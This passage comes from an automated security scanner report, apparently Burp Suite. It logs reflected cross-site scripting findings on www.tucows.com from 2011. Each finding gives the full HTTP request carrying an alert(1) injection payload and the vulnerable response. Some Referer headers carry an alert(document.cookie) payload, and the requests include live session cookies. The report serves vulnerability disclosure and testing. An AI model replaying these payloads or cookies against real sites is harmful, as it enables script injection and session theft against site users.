<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/js/yetii.jsdd99a"-alert(1)-"3c47dc9c7d2";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.369. http://www.tucows.com/includes/themes/03BlueMeany/style.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/themes/03BlueMeany/style.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f648"-alert(1)-"92dc0f19f81 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes5f648"-alert(1)-"92dc0f19f81/themes/03BlueMeany/style.css HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:42 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31991

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes5f648"-alert(1)-"92dc0f19f81/themes/03BlueMeany/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.370. http://www.tucows.com/includes/themes/03BlueMeany/style.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/themes/03BlueMeany/style.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fbe1d"-alert(1)-"607a37a5993 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/themesfbe1d"-alert(1)-"607a37a5993/03BlueMeany/style.css HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:55 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32590

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/themesfbe1d"-alert(1)-"607a37a5993/03BlueMeany/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.371. http://www.tucows.com/includes/themes/03BlueMeany/style.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/themes/03BlueMeany/style.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e65b"-alert(1)-"157ede0dbba was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/themes/03BlueMeany8e65b"-alert(1)-"157ede0dbba/style.css HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:23:03 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32182

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/themes/03BlueMeany8e65b"-alert(1)-"157ede0dbba/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.372. http://www.tucows.com/includes/themes/03BlueMeany/style.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/themes/03BlueMeany/style.css

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b311"-alert(1)-"4061c82776f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/themes/03BlueMeany/style.css6b311"-alert(1)-"4061c82776f HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:23:09 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32209

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/themes/03BlueMeany/style.css6b311"-alert(1)-"4061c82776f";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.373. http://www.tucows.com/includes/themes/03BlueMeany/styles.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/themes/03BlueMeany/styles.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca09d"-alert(1)-"a861b895462 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includesca09d"-alert(1)-"a861b895462/themes/03BlueMeany/styles.css HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:40 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32362

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includesca09d"-alert(1)-"a861b895462/themes/03BlueMeany/styles.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.374. http://www.tucows.com/includes/themes/03BlueMeany/styles.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/themes/03BlueMeany/styles.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 78125"-alert(1)-"fa4d78589f4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/themes78125"-alert(1)-"fa4d78589f4/03BlueMeany/styles.css HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:55 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32536

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/themes78125"-alert(1)-"fa4d78589f4/03BlueMeany/styles.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.375. http://www.tucows.com/includes/themes/03BlueMeany/styles.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/themes/03BlueMeany/styles.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8817"-alert(1)-"edfcd1015e9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/themes/03BlueMeanya8817"-alert(1)-"edfcd1015e9/styles.css HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:23:04 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31785

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/themes/03BlueMeanya8817"-alert(1)-"edfcd1015e9/styles.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.376. http://www.tucows.com/includes/themes/03BlueMeany/styles.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/themes/03BlueMeany/styles.css

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7526e"-alert(1)-"6df19e35abd was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/themes/03BlueMeany/styles.css7526e"-alert(1)-"6df19e35abd HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:23:12 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31902

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/themes/03BlueMeany/styles.css7526e"-alert(1)-"6df19e35abd";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.377. http://www.tucows.com/index.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /index.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3691"-alert(1)-"68987ea07e0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index.htmlb3691"-alert(1)-"68987ea07e0 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:29:20 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/index.htmlb3691"-alert(1)-"68987ea07e0";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.378. http://www.tucows.com/index.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4d0f6"-alert(1)-"63213006432 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index.html?4d0f6"-alert(1)-"63213006432=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:28:32 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 84335

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Free Software and Sh
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/index.html?4d0f6"-alert(1)-"63213006432=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.379. http://www.tucows.com/preview/194850/x22 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /preview/194850/x22

Issue detail

